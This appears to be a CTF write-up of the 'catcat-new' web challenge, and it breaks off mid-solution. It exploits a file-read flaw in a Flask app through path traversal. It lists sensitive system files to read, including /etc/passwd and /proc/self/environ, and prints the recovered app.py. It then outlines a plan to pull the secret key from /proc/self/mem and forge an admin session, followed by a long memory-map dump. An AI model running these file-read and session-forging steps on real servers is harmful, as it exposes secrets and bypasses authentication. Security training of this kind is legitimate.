[攻防世界] Web Series: catcat-new

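From the challenge environment we can tell that an arbitrary file inclusion vulnerability exists, but the flag file cannot be reached by traversing to it.

Here are a few commonly checked sensitive files on Linux: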

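/etc/passwd
/proc/self          # the currently running process
/proc/self/cmdline  # command-line arguments of the current process
/proc/self/mem      # memory contents of the current process
/proc/self/maps     # memory mappings of the current process
/proc/self/environ  # environment variables of the current process
/proc/self/fd       # contents and paths of the files the current process has open
/proc/self/exe      # the executable of the current process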

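An attempt to write a shell through the php://input pseudo-protocol failed, so the backend is probably not PHP.

Reading /proc/self/cmdline, the command line of the running process, shows that app.py is started with python.

app.py suggests the site is built on the Flask framework, so we read the app.py file next.

The app.py output was lightly cleaned up, which gives the following: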

import os
import uuid
from flask import Flask, request, session, render_template, Markup
from cat import cat

flag = ""
app = Flask(
    __name__,
    static_url_path='/',
    static_folder='static'
)
# Random hex string with a fixed suffix appended
app.config['SECRET_KEY'] = str(uuid.uuid4()).replace("-", "") + "*abcdefgh"
if os.path.isfile("/flag"):
    flag = cat("/flag")  # load the flag file into memory
    os.remove("/flag")   # delete the flag file from disk


@app.route('/', methods=['GET'])
def index():
    detailtxt = os.listdir('./details/')
    cats_list = []
    for i in detailtxt:
        cats_list.append(i[:i.index('.')])

    return render_template("index.html", cats_list=cats_list, cat=cat)


@app.route('/info', methods=["GET", 'POST'])
def info():
    # The user-supplied file name is appended to the directory without any check
    filename = "./details/" + request.args.get('file', "")
    start = request.args.get('start', "0")
    end = request.args.get('end', "0")
    name = request.args.get('file', "")[:request.args.get('file', "").index('.')]

    return render_template("detail.html", catname=name, info=cat(filename, start, end))


@app.route('/admin', methods=["GET"])
def admin_can_list_root():
    # The flag is returned at /admin only when the session contains admin=1
    if session.get('admin') == 1:
        return flag
    else:
        session['admin'] = 0
        return "NoNoNo"


if __name__ == '__main__':
    app.run(host='0.0.0.0', debug=False, port=5637)

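The code above gives us the solving logic: at startup the app loads the flag file into memory and then deletes it, and the /admin route returns the flag only if the session contains admin=1. So the Flask session has to be forged, which first requires the secret_key. /proc/self/maps gives the memory mappings of the process, and from those we can locate the secret_key value in memory.

The maps data is as follows: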

56322e390000-56322e391000 r--p 00000000 fd:00 23480232 /usr/local/bin/python3.7
56322e391000-56322e392000 r-xp 00001000 fd:00 23480232 /usr/local/bin/python3.7
56322e392000-56322e393000 r--p 00002000 fd:00 23480232 /usr/local/bin/python3.7
56322e393000-56322e394000 r--p 00002000 fd:00 23480232 /usr/local/bin/python3.7
56322e394000-56322e395000 rw-p 00003000 fd:00 23480232 /usr/local/bin/python3.7
56322eccc000-56322eccd000 ---p 00000000 00:00 0 [heap]
56322eccd000-56322ecd1000 rw-p 00000000 00:00 0 [heap]
7f82072af000-7f820732f000 rw-p 00000000 00:00 0
7f8207432000-7f8207434000 ---p 00000000 00:00 0
7f8207434000-7f820753d000 rw-p 00000000 00:00 0
7f820754a000-7f820754e000 rw-p 00000000 00:00 0
7f8207554000-7f8207558000 rw-p 00000000 00:00 0
7f820755c000-7f82076f0000 rw-p 00000000 00:00 0
7f82076f1000-7f8207774000 rw-p 00000000 00:00 0
7f8207777000-7f82077bb000 rw-p 00000000 00:00 0
7f82077bb000-7f82077bd000 r--p 00000000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077bd000-7f82077bf000 r-xp 00002000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077bf000-7f82077c0000 r--p 00004000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077c0000-7f82077c1000 r--p 00004000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077c1000-7f82077c2000 rw-p 00005000 fd:00 23480898 /usr/local/lib/python3.7/lib-dynload/_posixsubprocess.cpython-37m-x86_64-linux-gnu.so
7f82077c2000-7f82077ce000 rw-p 00000000 00:00 0
7f82077d1000-7f82078c5000 rw-p 00000000 00:00 0
7f82078c6000-7f8207938000 rw-p 00000000 00:00 0
7f8207938000-7f820793e000 r--p 00000000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f820793e000-7f8207975000 r-xp 00006000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f8207975000-7f8207981000 r--p 0003d000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f8207981000-7f8207982000 r--p 00048000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f8207982000-7f820798a000 rw-p 00049000 fd:00 23480885 /usr/local/lib/python3.7/lib-dynload/_decimal.cpython-37m-x86_64-linux-gnu.so
7f820798a000-7f8207a15000 rw-p 00000000 00:00 0
7f8207a15000-7f8207a63000 rw-p 00000000 00:00 0
7f8207a63000-7f8207a66000 r--p 00000000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207a66000-7f8207a6a000 r-xp 00003000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207a6a000-7f8207b4b000 r--p 00007000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207b4b000-7f8207b4c000 r--p 000e7000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207b4c000-7f8207b69000 rw-p 000e8000 fd:00 23480934 /usr/local/lib/python3.7/lib-dynload/unicodedata.cpython-37m-x86_64-linux-gnu.so
7f8207b69000-7f8207b75000 rw-p 00000000 00:00 0
7f8207b76000-7f8207c06000 rw-p 00000000 00:00 0
7f8207c07000-7f8207d33000 rw-p 00000000 00:00 0
7f8207d33000-7f8207d4f000 r--p 00000000 fd:00 23348864 /lib/libssl.so.1.1
7f8207d4f000-7f8207d8f000 r-xp 0001c000 fd:00 23348864 /lib/libssl.so.1.1
7f8207d8f000-7f8207da7000 r--p 0005c000 fd:00 23348864 /lib/libssl.so.1.1
7f8207da7000-7f8207db0000 r--p 00073000 fd:00 23348864 /lib/libssl.so.1.1
7f8207db0000-7f8207db4000 rw-p 0007c000 fd:00 23348864 /lib/libssl.so.1.1
7f8207db4000-7f8207f85000 rw-p 00000000 00:00 0
7f8207f86000-7f8208003000 rw-p 00000000 00:00 0
7f8208004000-7f8208017000 rw-p 00000000 00:00 0
7f8208017000-7f8208019000 r--p 00000000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f8208019000-7f820801d000 r-xp 00002000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f820801d000-7f820801f000 r--p 00006000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f820801f000-7f8208020000 r--p 00007000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f8208020000-7f8208021000 rw-p 00008000 fd:00 23480918 /usr/local/lib/python3.7/lib-dynload/binascii.cpython-37m-x86_64-linux-gnu.so
7f8208021000-7f8208026000 rw-p 00000000 00:00 0
7f8208026000-7f820802b000 r--p 00000000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820802b000-7f8208036000 r-xp 00005000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f8208036000-7f820803b000 r--p 00010000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820803b000-7f820803c000 r--p 00014000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820803c000-7f820803e000 rw-p 00015000 fd:00 23480883 /usr/local/lib/python3.7/lib-dynload/_datetime.cpython-37m-x86_64-linux-gnu.so
7f820803e000-7f82080ac000 rw-p 00000000 00:00 0
7f82080ac000-7f82080ae000 r--p 00000000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080ae000-7f82080b2000 r-xp 00002000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b2000-7f82080b3000 r--p 00006000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b3000-7f82080b4000 r--p 00006000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b4000-7f82080b6000 rw-p 00007000 fd:00 23480930 /usr/local/lib/python3.7/lib-dynload/select.cpython-37m-x86_64-linux-gnu.so
7f82080b6000-7f82080c0000 rw-p 00000000 00:00 0
7f82080c0000-7f82080c4000 r--p 00000000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080c4000-7f82080cd000 r-xp 00004000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080cd000-7f82080d2000 r--p 0000d000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080d2000-7f82080d3000 r--p 00011000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080d3000-7f82080d8000 rw-p 00012000 fd:00 23480905 /usr/local/lib/python3.7/lib-dynload/_socket.cpython-37m-x86_64-linux-gnu.so
7f82080d8000-7f82080dd000 rw-p 00000000 00:00 0
7f82080de000-7f82080e7000 rw-p 00000000 00:00 0
7f82080e7000-7f82080e8000 r--p 00000000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080e8000-7f82080e9000 r-xp 00001000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080e9000-7f82080ea000 r--p 00002000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080ea000-7f82080eb000 r--p 00002000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080eb000-7f82080ec000 rw-p 00003000 fd:00 23480876 /usr/local/lib/python3.7/lib-dynload/_contextvars.cpython-37m-x86_64-linux-gnu.so
7f82080ec000-7f820816c000 rw-p 00000000 00:00 0
7f820816d000-7f82081c5000 rw-p 00000000 00:00 0
7f82081c6000-7f820835a000 rw-p 00000000 00:00 0
7f820835a000-7f820835b000 r--p 00000000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835b000-7f820835c000 r-xp 00001000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835c000-7f820835d000 r--p 00002000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835d000-7f820835e000 r--p 00002000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835e000-7f820835f000 rw-p 00003000 fd:00 23480896 /usr/local/lib/python3.7/lib-dynload/_opcode.cpython-37m-x86_64-linux-gnu.so
7f820835f000-7f82083b6000 rw-p 00000000 00:00 0
7f82083b6000-7f82083b7000 r--p 00000000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083b7000-7f82083ba000 r-xp 00001000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083ba000-7f82083bb000 r--p 00004000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083bb000-7f82083bc000 r--p 00004000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083bc000-7f82083bd000 rw-p 00005000 fd:00 23480900 /usr/local/lib/python3.7/lib-dynload/_random.cpython-37m-x86_64-linux-gnu.so
7f82083bd000-7f82083be000 r--p 00000000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083be000-7f82083bf000 r-xp 00001000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083bf000-7f82083c0000 r--p 00002000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083c0000-7f82083c1000 r--p 00002000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083c1000-7f82083c2000 rw-p 00003000 fd:00 23480867 /usr/local/lib/python3.7/lib-dynload/_bisect.cpython-37m-x86_64-linux-gnu.so
7f82083c2000-7f82083c4000 r--p 00000000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083c4000-7f82083d8000 r-xp 00002000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083d8000-7f82083da000 r--p 00016000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083da000-7f82083db000 r--p 00017000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083db000-7f82083dd000 rw-p 00018000 fd:00 23480903 /usr/local/lib/python3.7/lib-dynload/_sha3.cpython-37m-x86_64-linux-gnu.so
7f82083dd000-7f82083df000 r--p 00000000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083df000-7f82083e6000 r-xp 00002000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083e6000-7f82083e8000 r--p 00009000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083e8000-7f82083e9000 r--p 0000a000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083e9000-7f82083ea000 rw-p 0000b000 fd:00 23480868 /usr/local/lib/python3.7/lib-dynload/_blake2.cpython-37m-x86_64-linux-gnu.so
7f82083ea000-7f820845f000 r--p 00000000 fd:00 23348863 /lib/libcrypto.so.1.1
7f820845f000-7f82085b6000 r-xp 00075000 fd:00 23348863 /lib/libcrypto.so.1.1
7f82085b6000-7f820863a000 r--p 001cc000 fd:00 23348863 /lib/libcrypto.so.1.1
7f820863a000-7f8208665000 r--p 0024f000 fd:00 23348863 /lib/libcrypto.so.1.1
7f8208665000-7f8208667000 rw-p 0027a000 fd:00 23348863 /lib/libcrypto.so.1.1
7f8208667000-7f820866b000 rw-p 00000000 00:00 0
7f820866b000-7f820866d000 r--p 00000000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f820866d000-7f8208671000 r-xp 00002000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208671000-7f8208673000 r--p 00006000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208673000-7f8208674000 r--p 00007000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208674000-7f8208675000 rw-p 00008000 fd:00 23480888 /usr/local/lib/python3.7/lib-dynload/_hashlib.cpython-37m-x86_64-linux-gnu.so
7f8208675000-7f8208678000 r--p 00000000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208678000-7f8208680000 r-xp 00003000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208680000-7f8208682000 r--p 0000b000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208682000-7f8208683000 r--p 0000c000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208683000-7f8208685000 rw-p 0000d000 fd:00 23480922 /usr/local/lib/python3.7/lib-dynload/math.cpython-37m-x86_64-linux-gnu.so
7f8208685000-7f8208688000 r--p 00000000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f8208688000-7f820869b000 r-xp 00003000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f820869b000-7f82086a6000 r--p 00016000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f82086a6000-7f82086a7000 r--p 00020000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f82086a7000-7f82086a8000 rw-p 00021000 fd:00 23480205 /usr/lib/liblzma.so.5.2.5
7f82086a8000-7f82086aa000 r--p 00000000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086aa000-7f82086b3000 r-xp 00002000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b3000-7f82086b5000 r--p 0000b000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b5000-7f82086b6000 r--p 0000c000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b6000-7f82086b7000 rw-p 0000d000 fd:00 23480171 /usr/lib/libbz2.so.1.0.8
7f82086b7000-7f82086f7000 rw-p 00000000 00:00 0
7f82086f8000-7f820871a000 rw-p 00000000 00:00 0
7f820871b000-7f8208721000 rw-p 00000000 00:00 0
7f8208721000-7f820872a000 r--p 00000000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f820872a000-7f8208733000 r-xp 00009000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f8208733000-7f820873a000 r--p 00012000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f820873a000-7f820873b000 r--p 00018000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f820873b000-7f8208740000 rw-p 00019000 fd:00 23480907 /usr/local/lib/python3.7/lib-dynload/_ssl.cpython-37m-x86_64-linux-gnu.so
7f8208740000-7f8208744000 rw-p 00000000 00:00 0
7f8208744000-7f8208745000 r--p 00000000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208745000-7f8208746000 r-xp 00001000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208746000-7f8208747000 r--p 00002000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208747000-7f8208748000 r--p 00002000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208748000-7f8208749000 rw-p 00003000 fd:00 23480921 /usr/local/lib/python3.7/lib-dynload/grp.cpython-37m-x86_64-linux-gnu.so
7f8208749000-7f8208796000 rw-p 00000000 00:00 0
7f8208796000-7f8208799000 r--p 00000000 fd:00 23348866 /lib/libz.so.1.2.11
7f8208799000-7f82087a7000 r-xp 00003000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087a7000-7f82087ae000 r--p 00011000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087ae000-7f82087af000 r--p 00017000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087af000-7f82087b0000 rw-p 00018000 fd:00 23348866 /lib/libz.so.1.2.11
7f82087b0000-7f82087b2000 r--p 00000000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b2000-7f82087b5000 r-xp 00002000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b5000-7f82087b7000 r--p 00005000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b7000-7f82087b8000 r--p 00006000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087b8000-7f82087ba000 rw-p 00007000 fd:00 23480936 /usr/local/lib/python3.7/lib-dynload/zlib.cpython-37m-x86_64-linux-gnu.so
7f82087ba000-7f82087be000 r--p 00000000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087be000-7f82087d3000 r-xp 00004000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087d3000-7f82087d8000 r--p 00019000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087d8000-7f82087d9000 r--p 0001d000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087d9000-7f82087dc000 rw-p 0001e000 fd:00 23480897 /usr/local/lib/python3.7/lib-dynload/_pickle.cpython-37m-x86_64-linux-gnu.so
7f82087dc000-7f82087e4000 rw-p 00000000 00:00 0
7f82087e4000-7f82087e7000 r--p 00000000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087e7000-7f82087ed000 r-xp 00003000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087ed000-7f82087f0000 r--p 00009000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087f0000-7f82087f1000 r--p 0000b000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087f1000-7f82087f3000 rw-p 0000c000 fd:00 23480908 /usr/local/lib/python3.7/lib-dynload/_struct.cpython-37m-x86_64-linux-gnu.so
7f82087f3000-7f820884e000 rw-p 00000000 00:00 0
7f820884e000-7f8208850000 r--p 00000000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f8208850000-7f8208857000 r-xp 00002000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f8208857000-7f8208859000 r--p 00009000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f8208859000-7f820885a000 r--p 0000a000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f820885a000-7f820885b000 rw-p 0000b000 fd:00 23480890 /usr/local/lib/python3.7/lib-dynload/_json.cpython-37m-x86_64-linux-gnu.so
7f820885b000-7f8208866000 rw-p 00000000 00:00 0
7f8208866000-7f8208867000 r--p 00000000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f8208867000-7f8208868000 r-xp 00001000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f8208868000-7f8208869000 r--p 00002000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f8208869000-7f820886a000 r--p 00002000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f820886a000-7f820886b000 rw-p 00003000 fd:00 44325187 /usr/local/lib/python3.7/site-packages/markupsafe/_speedups.cpython-37m-x86_64-linux-gnu.so
7f820886b000-7f82089ca000 rw-p 00000000 00:00 0
7f82089ca000-7f82089cb000 r--p 00000000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089cb000-7f82089cc000 r-xp 00001000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089cc000-7f82089cd000 r--p 00002000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089cd000-7f82089ce000 r--p 00002000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089ce000-7f82089d0000 rw-p 00003000 fd:00 23480889 /usr/local/lib/python3.7/lib-dynload/_heapq.cpython-37m-x86_64-linux-gnu.so
7f82089d0000-7f82089d3000 rw-p 00000000 00:00 0
7f82089d3000-7f82089d5000 r--p 00000000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089d5000-7f82089d9000 r-xp 00002000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089d9000-7f82089da000 r--p 00006000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089da000-7f82089db000 r--p 00006000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089db000-7f82089dc000 rw-p 00007000 fd:00 23480065 /lib/libuuid.so.1.3.0
7f82089dc000-7f82089dd000 r--p 00000000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089dd000-7f82089de000 r-xp 00001000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089de000-7f82089df000 r--p 00002000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089df000-7f82089e0000 r--p 00002000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089e0000-7f82089e1000 rw-p 00003000 fd:00 23480914 /usr/local/lib/python3.7/lib-dynload/_uuid.cpython-37m-x86_64-linux-gnu.so
7f82089e1000-7f8208a7b000 rw-p 00000000 00:00 0
7f8208a7b000-7f8208a7d000 r--p 00000000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a7d000-7f8208a80000 r-xp 00002000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a80000-7f8208a82000 r--p 00005000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a82000-7f8208a83000 r--p 00006000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a83000-7f8208a85000 rw-p 00007000 fd:00 23480892 /usr/local/lib/python3.7/lib-dynload/_lzma.cpython-37m-x86_64-linux-gnu.so
7f8208a85000-7f8208a87000 r--p 00000000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a87000-7f8208a89000 r-xp 00002000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a89000-7f8208a8a000 r--p 00004000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a8a000-7f8208a8b000 r--p 00004000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a8b000-7f8208a8c000 rw-p 00005000 fd:00 23480869 /usr/local/lib/python3.7/lib-dynload/_bz2.cpython-37m-x86_64-linux-gnu.so
7f8208a8c000-7f8208c6e000 rw-p 00000000 00:00 0
7f8208c6e000-7f8208ccd000 r--p 00000000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208ccd000-7f8208e68000 r-xp 0005f000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208e68000-7f8208f14000 r--p 001fa000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208f14000-7f8208f1a000 r--p 002a5000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208f1a000-7f8208f82000 rw-p 002ab000 fd:00 23480353 /usr/local/lib/libpython3.7m.so.1.0
7f8208f82000-7f8208fa3000 rw-p 00000000 00:00 0
7f8208fa3000-7f8208fb8000 r--p 00000000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8208fb8000-7f8209000000 r-xp 00015000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8209000000-7f8209036000 r--p 0005d000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
7f8209036000-7f8209037000 r--p 00092000 fd:00 23348860 /lib/ld-musl-x86_64.so.1
